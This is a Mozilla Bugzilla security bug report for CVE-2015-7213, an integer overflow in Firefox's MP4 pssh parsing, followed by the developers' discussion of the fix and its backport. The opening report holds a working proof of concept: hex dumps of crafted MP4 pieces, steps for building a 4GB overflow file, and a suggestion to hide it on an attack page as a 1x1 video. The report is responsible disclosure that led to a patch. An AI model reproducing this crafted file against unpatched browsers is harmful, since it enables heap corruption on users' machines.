Bug 1206211 (CVE-2015-7213)

Overflow in MPEG4Extractor::readMetaData causes memory-safety bug

VERIFIED FIXED in Firefox 43

Status

()

defect
VERIFIED FIXED
4 years ago
2 years ago

People

(Reporter: q1, Assigned: jya)

Tracking

({csectype-intoverflow, sec-high})

40 Branch
mozilla44
Points:
---
Dependency tree / graph
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox43+ verified, firefox44+ verified, firefox-esr3843+ verified)

Details

(Whiteboard: [adv-main43+][adv-esr38.5+])

Attachments

(8 attachments)

MPEG4Extractor::readMetaData (media\libstagefright\frameworks\av\media\libstagefright\MPEG4Extractor.cpp) will experience an integer overflow with certain MP4 files. This causes the function to allocate a erroneously-small buffer, which it then overruns. The data causing the overrun comes directly from the MP4 file and is, thus, under an attacker's control. This bug currently is exploitable only on x64 versions of FF, but it might be possible to exploit it on x86 versions as well.

Details
-------

The bug is in lines 511-514:

511:    int psshsize = 0;
512:    for (size_t i = 0; i < mPssh.size(); i++) {
513:        psshsize += 20 + mPssh[i].datalen;
514:    }
515:    if (psshsize) {
516:        char *buf = (char*)malloc(psshsize);
517:        char *ptr = buf;
518:        for (size_t i = 0; i < mPssh.size(); i++) {
519:            memcpy(ptr, mPssh[i].uuid, 20); // uuid + length
520:            memcpy(ptr + 20, mPssh[i].data, mPssh[i].datalen);
521:            ptr += (20 + mPssh[i].datalen);
522:        }
523:        mFileMetaData->setData(kKeyPssh, 'pssh', buf, psshsize);
524:        free(buf);
525:    }

which don't check for overflow of |psshsize|. Thus, a file containing pssh boxes totalling > 4GB cause line 513 to overflow. Line 516 then allocates an erroneously-small buffer, which lines 518-522 then overrun with data extracted directly from the MP4 file.

This bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/37c7812ce0e6/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp .

The bug is easy to invoke. Using a binary editor, create poc_header.bin with the following data:

000: 00  00  00  1c  66  74  79  70  6d  70  34  32  00  00  00  00
010: 6d  70  34  32  69  73  6f  6d  61  76  63  31  00  00  00  84
020: 66  72  65  65  00  00  00  00  00  00  00  00  00  00  00  00
030: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
040: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
050: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
060: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
070: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
080: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
090: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00

Then create poc_trailer.bin with this data:

000: 00  00  0d  83  6d  6f  6f  76  00  00  00  6c  6d  76  68  64       moov   lmvhd
010: 00  00  00  00  c7  ca  ee  a7  c7  ca  ee  a8  00  01  5f  90                 _ 
020: 00  07  a5  80  00  01  00  00  01  00  00  00  00  00  00  00                   
030: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
040: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
050: 00  00  00  00  40  00  00  00  00  00  00  00  00  00  00  00       @           
060: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00                   
070: 00  00  00  03  00  00  00  18  69  6f  64  73  00  00  00  00           iods    
080: 10  80  80  80  07  00  4f  ff  ff  0f  7f  ff  00  00  06  0a         O         
090: 74  72  61  6b  00  00  00  5c  74  6b  68  64  00  00  00  01   trak   \tkhd    
0a0: c7  ca  ee  a7  c7  ca  ee  a8  00  00  00  01  00  00  00  00                   
0b0: 00  07  99  50  00  00  00  00  00  00  00  00  00  00  00  00      P            
0c0: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
0d0: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
0e0: 00  00  00  00  40  00  00  00  02  30  00  00  01  40  00  00       @    0   @  
0f0: 00  00  05  a6  6d  64  69  61  00  00  00  20  6d  64  68  64       mdia    mdhd
100: 00  00  00  00  c7  ca  ee  a7  c7  ca  ee  a8  00  01  5f  90                 _ 
110: 00  07  99  50  55  c4  00  00  00  00  00  21  68  64  6c  72      PU      !hdlr
120: 00  00  00  00  00  00  00  00  76  69  64  65  00  00  00  00           vide    
130: 00  00  00  00  00  00  00  00  00  00  00  05  5d  6d  69  6e               ]min
140: 66  00  00  00  14  76  6d  68  64  00  00  00  01  00  00  00   f    vmhd       
150: 00  00  00  00  00  00  00  00  24  64  69  6e  66  00  00  00           $dinf   
160: 1c  64  72  65  66  00  00  00  00  00  00  00  01  00  00  00    dref           
170: 0c  75  72  6c  20  00  00  00  01  00  00  05  1d  73  74  62    url         stb
180: 6c  00  00  00  ab  73  74  73  64  00  00  00  00  00  00  00   l    stsd       
190: 01  00  00  00  9b  61  76  63  31  00  00  00  00  00  00  00        avc1       
1a0: 01  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00                   
1b0: 00  02  30  01  40  00  48  00  00  00  48  00  00  00  00  00     0 @ H   H     
1c0: 00  00  01  0e  4a  56  54  2f  41  56  43  20  43  6f  64  69       JVT/AVC Codi
1d0: 6e  67  00  00  00  00  00  00  00  00  00  00  00  00  00  00   ng              
1e0: 00  00  00  00  18  ff  ff  00  00  00  33  61  76  63  43  01             3avcC 
1f0: 42  c0  1e  ff  e1  00  1b  67  42  c0  1e  9e  21  81  18  53   B      gB   !  S
200: 4d  40  40  40  50  00  00  03  00  10  00  00  03  03  c8  f1   M@@@P           
210: 62  ee  01  00  05  68  ce  06  cb  20  00  00  00  12  63  6f   b    h        co
220: 6c  72  6e  63  6c  63  00  01  00  01  00  01  00  00  00  18   lrnclc          
230: 73  74  74  73  00  00  00  00  00  00  00  01  00  00  00  a6   stts            
240: 00  00  0b  b8  00  00  02  ac  73  74  73  7a  00  00  00  00           stsz    
250: 00  00  00  00  00  00  00  a6  00  00  56  27  00  00  0b  20             V'    
260: 00  00  05  bc  00  00  05  e2  00  00  05  c1  00  00  04  37                  7
270: 00  00  04  07  00  00  03  b6  00  00  06  45  00  00  03  73              E   s
280: 00  00  05  12  00  00  03  26  00  00  02  e9  00  00  03  7b          &       {
290: 00  00  03  4a  00  00  03  6b  00  00  02  b6  00  00  03  4c      J   k       L
2a0: 00  00  02  7a  00  00  02  c7  00  00  02  2e  00  00  03  16      z       .    
2b0: 00  00  02  26  00  00  02  7f  00  00  01  ec  00  00  01  ea      &            
2c0: 00  00  01  f5  00  00  01  eb  00  00  01  fa  00  00  01  e7                   
2d0: 00  00  01  fc  00  00  01  dd  00  00  01  c6  00  00  01  ae                   
2e0: 00  00  01  c8  00  00  01  b9  00  00  01  90  00  00  01  93                   
2f0: 00  00  01  8c  00  00  01  da  00  00  01  c2  00  00  05  d0                   
300: 00  00  07  b8  00  00  06  7a  00  00  09  a9  00  00  0a  2c          z       ,
310: 00  00  0a  7c  00  00  0c  b3  00  00  09  8c  00  00  09  52      |           R
320: 00  00  0c  04  00  00  0d  c1  00  00  0f  74  00  00  10  48              t   H
330: 00  00  11  06  00  00  10  61  00  00  0c  63  00  00  0c  31          a   c   1
340: 00  00  0b  42  00  00  0c  0d  00  00  0f  32  00  00  0a  7b      B       2   {
350: 00  00  0d  0f  00  00  0a  e0  00  00  0a  0e  00  00  0b  6b                  k
360: 00  00  08  74  00  00  0c  36  00  00  09  e6  00  00  06  8d      t   6        
370: 00  00  04  f8  00  00  07  8a  00  00  07  c1  00  00  09  f3                   
380: 00  00  07  c7  00  00  0a  cb  00  00  0a  d2  00  00  0b  74                  t
390: 00  00  0c  28  00  00  0a  9a  00  00  0c  60  00  00  0d  6d      (       `   m
3a0: 00  00  0c  3e  00  00  0f  fc  00  00  0e  82  00  00  0b  79      >           y
3b0: 00  00  0d  e4  00  00  0d  24  00  00  0a  17  00  00  11  aa          $        
3c0: 00  00  12  65  00  00  0d  7b  00  00  12  a0  00  00  13  d8      e   {        
3d0: 00  00  11  49  00  00  0e  59  00  00  10  15  00  00  16  81      I   Y        
3e0: 00  00  09  b4  00  00  06  eb  00  00  05  ef  00  00  05  8a                   
3f0: 00  00  03  d7  00  00  04  0d  00  00  03  bb  00  00  04  6b                  k
400: 00  00  03  40  00  00  03  30  00  00  02  de  00  00  03  ae      @   0        
410: 00  00  05  cf  00  00  04  6c  00  00  05  69  00  00  05  00          l   i    
420: 00  00  06  a1  00  00  03  35  00  00  04  1a  00  00  03  fa          5        
430: 00  00  06  3d  00  00  05  d6  00  00  04  68  00  00  02  d6      =       h    
440: 00  00  04  b5  00  00  02  d9  00  00  02  7f  00  00  02  4d                  M
450: 00  00  02  7d  00  00  03  8c  00  00  02  06  00  00  02  01      }            
460: 00  00  07  7f  00  00  05  ef  00  00  05  b8  00  00  04  0a                   
470: 00  00  02  99  00  00  03  1d  00  00  07  c5  00  00  05  ac                   
480: 00  00  04  78  00  00  08  71  00  00  08  99  00  00  08  e9      x   q        
490: 00  00  08  99  00  00  05  73  00  00  07  c7  00  00  08  3d          s       =
4a0: 00  00  0b  59  00  00  0a  36  00  00  06  ba  00  00  05  f9      Y   6        
4b0: 00  00  07  2e  00  00  06  eb  00  00  04  c6  00  00  04  ba      .            
4c0: 00  00  05  66  00  00  04  31  00  00  06  8a  00  00  06  cf      f   1        
4d0: 00  00  06  fe  00  00  04  97  00  00  02  43  00  00  03  e2              C    
4e0: 00  00  04  06  00  00  02  e6  00  00  02  6b  00  00  02  75              k   u
4f0: 00  00  00  28  73  74  73  63  00  00  00  00  00  00  00  02      (stsc        
500: 00  00  00  01  00  00  00  04  00  00  00  01  00  00  00  2a                  *
510: 00  00  00  02  00  00  00  01  00  00  00  b8  73  74  63  6f               stco
520: 00  00  00  00  00  00  00  2a  00  00  00  a8  00  00  73  e6          *      s 
530: 00  00  8b  f4  00  00  a4  08  00  00  b7  64  00  00  c8  a5              d    
540: 00  00  d7  d8  00  00  e4  a5  00  00  ec  5f  00  00  f8  5f              _   _
550: 00  01  04  41  00  01  1f  c3  00  01  51  85  00  01  84  7e      A      Q    ~
560: 00  01  cc  a6  00  02  03  c0  00  02  3c  52  00  02  66  75             <R  fu
570: 00  02  8a  1c  00  02  b4  a6  00  02  e7  66  00  03  23  01              f  # 
580: 00  03  5d  ac  00  03  9e  97  00  03  ea  64  00  04  26  0a     ]        d  & 
590: 00  04  3e  69  00  04  4c  ff  00  04  63  d9  00  04  7e  43     >i  L   c   ~C
5a0: 00  04  98  9b  00  04  ad  a9  00  04  be  f7  00  04  d7  94                   
5b0: 00  04  ed  6c  00  05  0e  3b  00  05  2d  c9  00  05  59  f0      l   ;  -   Y 
5c0: 00  05  7b  82  00  05  95  2b  00  05  b3  da  00  05  c6  67     {    +       g
5d0: 00  00  00  14  73  74  73  73  00  00  00  00  00  00  00  01       stss        
5e0: 00  00  00  01  00  00  00  b2  73  64  74  70  00  00  00  00           sdtp    
5f0: 04  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44    DDDDDDDDDDDDDDD
600: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
610: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
620: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
630: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
640: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
650: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
660: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
670: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
680: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
690: 44  44  44  44  44  44  00  00  06  7e  74  72  61  6b  00  00   DDDDDD   ~trak  
6a0: 00  5c  74  6b  68  64  00  00  00  03  c7  ca  ee  a7  c7  ca    \tkhd          
6b0: ee  a8  00  00  00  02  00  00  00  00  00  07  a5  80  00  00                   
6c0: 00  00  00  00  00  00  00  00  00  00  01  00  00  00  00  01                   
6d0: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  01                   
6e0: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  40  00                 @ 
6f0: 00  00  00  00  00  00  00  00  00  00  00  00  06  04  6d  64                 md
700: 69  61  00  00  00  20  6d  64  68  64  00  00  00  00  c7  ca   ia    mdhd      
710: ee  a7  c7  ca  ee  a8  00  00  bb  80  00  04  14  00  15  c7                   
720: 00  00  00  00  00  21  68  64  6c  72  00  00  00  00  00  00        !hdlr      
730: 00  00  73  6f  75  6e  00  00  00  00  00  00  00  00  00  00     soun          
740: 00  00  00  00  00  05  bb  6d  69  6e  66  00  00  00  10  73          minf    s
750: 6d  68  64  00  00  00  00  00  00  00  00  00  00  00  24  64   mhd           $d
760: 69  6e  66  00  00  00  1c  64  72  65  66  00  00  00  00  00   inf    dref     
770: 00  00  01  00  00  00  0c  75  72  6c  20  00  00  00  01  00          url      
780: 00  05  7f  73  74  62  6c  00  00  00  67  73  74  73  64  00      stbl   gstsd 
790: 00  00  00  00  00  00  01  00  00  00  57  6d  70  34  61  00             Wmp4a 
7a0: 00  00  00  00  00  00  01  00  00  00  00  00  00  00  00  00                   
7b0: 01  00  10  00  00  00  00  bb  80  00  00  00  00  00  33  65                 3e
7c0: 73  64  73  00  00  00  00  03  80  80  80  22  00  00  00  04   sds        "    
7d0: 80  80  80  14  40  15  00  01  18  00  01  65  f0  00  01  44       @      e   D
7e0: 6b  05  80  80  80  02  11  88  06  80  80  80  01  02  00  00   k               
7f0: 00  18  73  74  74  73  00  00  00  00  00  00  00  01  00  00     stts          
800: 01  05  00  00  04  00  00  00  04  28  73  74  73  7a  00  00            (stsz  
810: 00  00  00  00  00  00  00  00  01  05  00  00  00  f7  00  00                   
820: 00  db  00  00  00  e1  00  00  00  e5  00  00  00  e9  00  00                   
830: 00  e8  00  00  00  f0  00  00  00  f1  00  00  00  ef  00  00                   
840: 00  d8  00  00  00  e6  00  00  00  e7  00  00  00  e9  00  00                   
850: 00  eb  00  00  00  ea  00  00  00  e8  00  00  00  e1  00  00                   
860: 00  e7  00  00  00  d7  00  00  00  da  00  00  00  d9  00  00                   
870: 00  db  00  00  00  e9  00  00  00  ee  00  00  00  e5  00  00                   
880: 00  e1  00  00  00  e6  00  00  00  e5  00  00  00  d8  00  00                   
890: 00  dd  00  00  00  dd  00  00  00  d5  00  00  00  ea  00  00                   
8a0: 00  dd  00  00  00  d0  00  00  00  d6  00  00  00  e9  00  00                   
8b0: 00  bc  00  00  00  ab  00  00  00  b3  00  00  00  b5  00  00                   
8c0: 00  bc  00  00  00  ce  00  00  00  b4  00  00  00  b6  00  00                   
8d0: 00  b3  00  00  00  b6  00  00  00  b7  00  00  00  bf  00  00                   
8e0: 00  b7  00  00  00  cd  00  00  00  c1  00  00  00  ba  00  00                   
8f0: 00  a7  00  00  00  b4  00  00  00  b1  00  00  00  be  00  00                   
900: 00  d0  00  00  00  ba  00  00  00  bc  00  00  00  c4  00  00                   
910: 00  c6  00  00  00  cb  00  00  00  c4  00  00  00  c3  00  00                   
920: 00  c8  00  00  00  d2  00  00  00  d2  00  00  00  d6  00  00                   
930: 00  f5  00  00  00  fa  00  00  00  f6  00  00  01  02  00  00                   
940: 00  fc  00  00  00  fc  00  00  00  ee  00  00  00  e6  00  00                   
950: 00  ea  00  00  00  ea  00  00  00  e8  00  00  00  de  00  00                   
960: 00  df  00  00  00  e7  00  00  00  f6  00  00  00  ff  00  00                   
970: 01  03  00  00  00  f6  00  00  01  08  00  00  01  03  00  00                   
980: 00  fd  00  00  01  05  00  00  01  02  00  00  01  00  00  00                   
990: 01  14  00  00  01  18  00  00  00  fd  00  00  00  fb  00  00                   
9a0: 01  11  00  00  01  05  00  00  01  05  00  00  01  0a  00  00                   
9b0: 01  01  00  00  00  f3  00  00  00  f7  00  00  00  f7  00  00                   
9c0: 01  01  00  00  01  02  00  00  00  f8  00  00  00  f8  00  00                   
9d0: 00  ef  00  00  00  ed  00  00  00  e3  00  00  00  ec  00  00                   
9e0: 00  e2  00  00  00  e8  00  00  00  dc  00  00  00  e0  00  00                   
9f0: 00  f3  00  00  00  df  00  00  00  e1  00  00  00  cf  00  00                   
a00: 00  ce  00  00  00  d8  00  00  00  ce  00  00  00  c7  00  00                   
a10: 00  cd  00  00  00  b7  00  00  00  af  00  00  00  c8  00  00                   
a20: 00  d7  00  00  00  e5  00  00  00  e4  00  00  00  c6  00  00                   
a30: 00  d1  00  00  00  d5  00  00  00  e5  00  00  00  d8  00  00                   
a40: 00  c8  00  00  00  be  00  00  00  bf  00  00  00  cb  00  00                   
a50: 00  d2  00  00  00  c8  00  00  00  ca  00  00  00  b1  00  00                   
a60: 00  a3  00  00  00  c7  00  00  00  dc  00  00  00  d9  00  00                   
a70: 00  dd  00  00  00  d1  00  00  00  d2  00  00  00  c2  00  00                   
a80: 00  bc  00  00  00  b1  00  00  00  9b  00  00  00  89  00  00                   
a90: 00  a2  00  00  00  9f  00  00  00  b5  00  00  00  a6  00  00                   
aa0: 00  b2  00  00  00  b5  00  00  00  ae  00  00  00  b4  00  00                   
ab0: 00  b0  00  00  00  c6  00  00  00  c3  00  00  00  d5  00  00                   
ac0: 00  e4  00  00  00  f6  00  00  00  d6  00  00  00  db  00  00                   
ad0: 00  cc  00  00  00  e7  00  00  00  f9  00  00  00  cb  00  00                   
ae0: 00  d8  00  00  00  d6  00  00  00  e4  00  00  00  f1  00  00                   
af0: 00  e4  00  00  00  e6  00  00  00  df  00  00  00  ee  00  00                   
b00: 00  d7  00  00  00  c7  00  00  00  e7  00  00  00  f9  00  00                   
b10: 00  ed  00  00  00  cf  00  00  00  f1  00  00  00  e6  00  00                   
b20: 00  dc  00  00  00  e4  00  00  00  ef  00  00  00  e5  00  00                   
b30: 00  f1  00  00  00  e3  00  00  00  ec  00  00  00  ec  00  00                   
b40: 00  f3  00  00  00  f5  00  00  00  fd  00  00  01  0b  00  00                   
b50: 01  10  00  00  01  11  00  00  01  03  00  00  01  01  00  00                   
b60: 00  fb  00  00  00  fa  00  00  00  e7  00  00  00  e5  00  00                   
b70: 00  f0  00  00  00  d2  00  00  00  e5  00  00  00  f3  00  00                   
b80: 00  f1  00  00  00  f2  00  00  00  ff  00  00  00  f7  00  00                   
b90: 00  ee  00  00  00  d5  00  00  00  d9  00  00  00  ea  00  00                   
ba0: 00  e3  00  00  00  df  00  00  00  f7  00  00  00  ff  00  00                   
bb0: 00  f8  00  00  00  fa  00  00  00  fd  00  00  00  f7  00  00                   
bc0: 00  f9  00  00  00  fb  00  00  00  f8  00  00  00  f6  00  00                   
bd0: 00  f0  00  00  00  fe  00  00  01  02  00  00  00  e9  00  00                   
be0: 00  ec  00  00  00  ec  00  00  00  e7  00  00  00  ea  00  00                   
bf0: 00  de  00  00  00  e2  00  00  00  c9  00  00  00  d4  00  00                   
c00: 00  d4  00  00  00  c7  00  00  00  c9  00  00  00  c8  00  00                   
c10: 00  c1  00  00  00  c0  00  00  00  bd  00  00  00  de  00  00                   
c20: 00  cb  00  00  00  cd  00  00  00  d4  00  00  00  6d  00  00                m  
c30: 00  28  73  74  73  63  00  00  00  00  00  00  00  02  00  00    (stsc          
c40: 00  01  00  00  00  07  00  00  00  01  00  00  00  26  00  00                &  
c50: 00  02  00  00  00  01  00  00  00  a8  73  74  63  6f  00  00             stco  
c60: 00  00  00  00  00  26  00  00  6d  8d  00  00  85  9b  00  00        &  m       
c70: 9d  e4  00  00  b1  21  00  00  c2  a7  00  00  d2  8e  00  00        !          
c80: df  8e  00  00  f3  54  00  00  fe  e8  00  01  1a  05  00  01        T          
c90: 4a  c7  00  01  7e  28  00  01  c5  a1  00  01  fc  89  00  02   J   ~(          
ca0: 35  5c  00  02  83  6a  00  02  ae  62  00  02  e1  ae  00  03   5\   j   b      
cb0: 1d  6d  00  03  58  04  00  03  99  4d  00  03  e4  b1  00  04    m  X    M      
cc0: 21  99  00  04  39  67  00  04  5d  c6  00  04  78  18  00  04   !   9g  ]   x   
cd0: 92  6a  00  04  a7  67  00  04  b8  7e  00  04  d0  6c  00  04    j   g   ~   l  
ce0: e7  0c  00  05  07  c6  00  05  53  5c  00  05  74  bc  00  05           S\  t   
cf0: 8e  99  00  05  ae  19  00  05  c0  eb  00  05  cb  47  00  00                G  
d00: 00  16  75  64  74  61  00  00  00  0e  6e  61  6d  65  53  74     udta    nameSt
d10: 65  72  65  6f  00  00  00  6f  75  64  74  61  00  00  00  67   ereo   oudta   g
d20: 6d  65  74  61  00  00  00  00  00  00  00  21  68  64  6c  72   meta       !hdlr
d30: 00  00  00  00  00  00  00  00  6d  64  69  72  00  00  00  00           mdir    
d40: 00  00  00  00  00  00  00  00  00  00  00  00  3a  69  6c  73               :ils
d50: 74  00  00  00  32  a9  74  6f  6f  00  00  00  2a  64  61  74   t   2 too   *dat
d60: 61  00  00  00  01  00  00  00  00  62  6c  61  68  62  6c  61   a        blahbla
d70: 68  62  20  30  2e  39  2e  34  20  32  32  32  32  31  31  32   hb 0.9.4 2222112
d80: 33  30  30  00  00  00  08  66  72  65  65  

Then create poc_body.bin with these contents:

000: 01  00  00  00  70  73  73  68  00  00  00  04  ee  ee  ee  ee       pssh
010: ee  ee  ee  ee  ee  ee  ee  ee  ee  ee  ee  ee  00  00  00  00
020: 50  75  74  20  79  6f  75  72  20  61  74  74  61  63  6b  20   Put your attack
030: 63  6f  64  65  20  61  6e  64  20  64  61  74  61  20  68  65   code and data he
040: 72  65  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e   re..............
050: 2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d   ----------------

Set the length of poc_body.bin to 0x01000000. It doesn't matter what bytes 0x20-0xffffff contain.

Next, repeatedly double poc_body.bin until it's exactly 0x100000000 bytes long (4GB).

Then copy poc_header.bin+poc_body.bin+poc_trailer.bin into poc_test.mp4 , Start FF Win64 and attach a debugger, setting a BP on line 511. Load poc_test.mp4 and wait for the BP to fire, then step the code to see the overflow and subsequent overrun.
The file takes ~30 sec to load. It could be embedded into an attack page as a 1x1 pixel video so users wouldn't notice it loading.
Flags: needinfo?(jyavenard)
Could you please attach the test file to make it easier to confirm? Thanks.
Flags: needinfo?(q1)
(In reply to Andrew McCreight [:mccr8] from comment #2)
> Could you please attach the test file to make it easier to confirm? Thanks.

OK. You'll need to edit the poc_body.bin file, extend it, and so forth as described at the end of comment 0. Otherwise it'd be too large to upload. I'll upload the binary files momentarily.
Flags: needinfo?(q1)
Posted file poc_header.bin
Posted file poc_trailer.bin
Posted file poc_body.bin
Attachment #8664340 - Attachment filename: poc_lsf_trailer_1.bin → poc_trailer.bin
Attachment #8664336 - Attachment filename: poc_lsf_hdr_1.bin → poc_header.bin
Attachment #8664342 - Attachment filename: poc_lsf_pssh_2.bin → poc_body.bin
OK. Enjoy!
(In reply to q1 from comment #3)
> (In reply to Andrew McCreight [:mccr8] from comment #2)
> > Could you please attach the test file to make it easier to confirm? Thanks.
> 
> OK. You'll need to edit the poc_body.bin file, extend it, and so forth as
> described at the end of comment 0. Otherwise it'd be too large to upload.
> I'll upload the binary files momentarily.

The described test case should compress very well with say xz or lzma if that body is just the same repeated byte. Can you please attach a ready to run test that has been compressed? Thanks.
Depends on: 1207312
(In reply to q1 from comment #9)
> Created attachment 8664449 [details]
> poc.7z -- unzip with 7z into ready-to-use POC

Thanks! I tried to reproduce the issue but hit another I came across while fuzzing a couple weeks ago. I have log the other issue. In the mean time any back traces or ASan logs that you managed to capture would also be nice to have.
(In reply to Tyson Smith [:tsmith] from comment #10)
> (In reply to q1 from comment #9)
> > Created attachment 8664449 [details]
> > poc.7z -- unzip with 7z into ready-to-use POC
> 
> Thanks! I tried to reproduce the issue but hit another I came across while
> fuzzing a couple weeks ago. I have log the other issue. In the mean time any
> back traces or ASan logs that you managed to capture would also be nice to
> have.

I found this via code inspection, then formulated the POC. I have tested it under FF 40.0 debug Win64, which is my build with a few trivial unrelated mods. It also crashes 40.0b8 Win64 downloaded directly from ftp.mozilla.org, and if you examine it in the debugger, the crash was clearly caused by memory getting overwritten with the POC's test pattern.
Flags: sec-bounty?
Flags: needinfo?(jyavenard)
git bz lost my comment will provide it again later.
Attachment #8665247 - Flags: review?(ajones)
Attachment #8665248 - Flags: review?(ajones)
So what I was saying (though will do in a shorter version)

While I could see how we could think it would happen theoretically, it can no longer happen following bug 1196398 (which is in 41 onward).
We only ever parse the ftyp and moov atoms ; anything in between is ignored. And as such, with this POC.mp4 you'll find that mPssh is an empty array.

We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such we don't attempt to parse pssh atoms ; we use the MoofParser for this which doesn't have this vulnerability.

Now you could attempt to craft a mp4 where those pssh would be within the moov atom; but for this to work, you would need the moov atom to have a size > 2GB which isn't possible and would cause a decoding error.

We could make the moov atom the last atom and make it with a size of 0 (which normally means: read to the end). However, stagefright doesn't support those and will return also an error as it will error if the atom size is below 8.

As such, this vulnerability doesn't apply in 41 and later.
Attachment #8665247 - Flags: review?(ajones) → review+
Attachment #8665248 - Flags: review?(ajones) → review+
Comment on attachment 8665247 [details] [diff] [review]
P1. Ensure operation can't overflow.

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
I don't believe they can in 41 and later with this POC.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
it's fairly generic; do mention 

Which older supported branches are affected by this flaw?
40 and earlier. esr38 is affected.

If not all supported branches, which bug introduced the flaw?
the stagefright one, over 1.5 years ago.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Patch should apply on 38.

How likely is this patch to cause regressions; how much testing does it need?
none ; we've applied the same logic elsewhere (limiting size to 2GiB)
Attachment #8665247 - Flags: sec-approval?
Assignee: nobody → jyavenard
!@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one was in it, and it got pushed :(

https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4
https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5

:(
(In reply to Jean-Yves Avenard [:jya] from comment #16)
> !@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one
> was in it, and it got pushed :(
> 
> https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4
> https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5
> 
> :(

per talking to dveditz on irc we let this check-in stay and not so far backing this out
(In reply to Jean-Yves Avenard [:jya] from comment #14)
> So what I was saying (though will do in a shorter version)
> 
> While I could see how we could think it would happen theoretically, it can
> no longer happen following bug 1196398 (which is in 41 onward).
> We only ever parse the ftyp and moov atoms ; anything in between is ignored.
> And as such, with this POC.mp4 you'll find that mPssh is an empty array.
> 
> We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such
> we don't attempt to parse pssh atoms ; we use the MoofParser for this which
> doesn't have this vulnerability.
> 
> Now you could attempt to craft a mp4 where those pssh would be within the
> moov atom; but for this to work, you would need the moov atom to have a size
> > 2GB which isn't possible and would cause a decoding error.
> 
> We could make the moov atom the last atom and make it with a size of 0
> (which normally means: read to the end). However, stagefright doesn't
> support those and will return also an error as it will error if the atom
> size is below 8.
> 
> As such, this vulnerability doesn't apply in 41 and later.

That's the conclusion I came to after trying the POC on 41 yesterday.
We need a security rating on this issue. This looks like an exploitable crash from an overflow. Is that right?

Am I correct in reading that we are *only* wanting this bug on ESR38, despite screw ups of checkins? :-)
Flags: needinfo?(jyavenard)
Group: core-security → media-core-security
https://hg.mozilla.org/mozilla-central/rev/680e1f669ea5
https://hg.mozilla.org/mozilla-central/rev/708cf76b6cb4
Status: NEW → RESOLVED
Closed: 4 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla44
(In reply to Al Billings [:abillings] from comment #19)
> We need a security rating on this issue. This looks like an exploitable
> crash from an overflow. Is that right?

Hard to tell really. Just as severe as all the other stagefright overflow. Probably more so because it's very easily to control what is going to be copied as the code simply replicate the content of the mp4 atoms.

> 
> Am I correct in reading that we are *only* wanting this bug on ESR38,
> despite screw ups of checkins? :-)

Yes, only for ESR38
Flags: needinfo?(jyavenard)
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high
Comment on attachment 8665247 [details] [diff] [review]
P1. Ensure operation can't overflow.

sec-approval+. Can you nominate for ESR38?
Attachment #8665247 - Flags: sec-approval? → sec-approval+
Group: media-core-security → core-security-release
Since libstagefright is a Google lib (I think!), I have reported this bug also at https://code.google.com/p/chromium/issues/detail?id=539372 .
This was supposed to have landed in the ESR release, let's not miss this one too.
ni? just to make sure releng is tracking this bug
Flags: needinfo?(rkothari)
As this bug is needed before bug 1216748, I've checked the patches for landing on Beta-43 (the original patches just work) and ESR-38 (new patches submitted above).

Note that they are already in Aurora-44, so no need to uplift them there.
Gerald, could you please nominate the ESR38 patch for uplift?
Flags: needinfo?(rkothari) → needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review]
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high.
User impact if declined: Potential OOMs, crashes with bad MP4 files.
Fix Landed on Version: 44
Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts.
String or UUID changes made by this patch: None.
Attachment #8694544 - Flags: approval-mozilla-esr38?
Comment on attachment 8694545 [details] [diff] [review]
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch

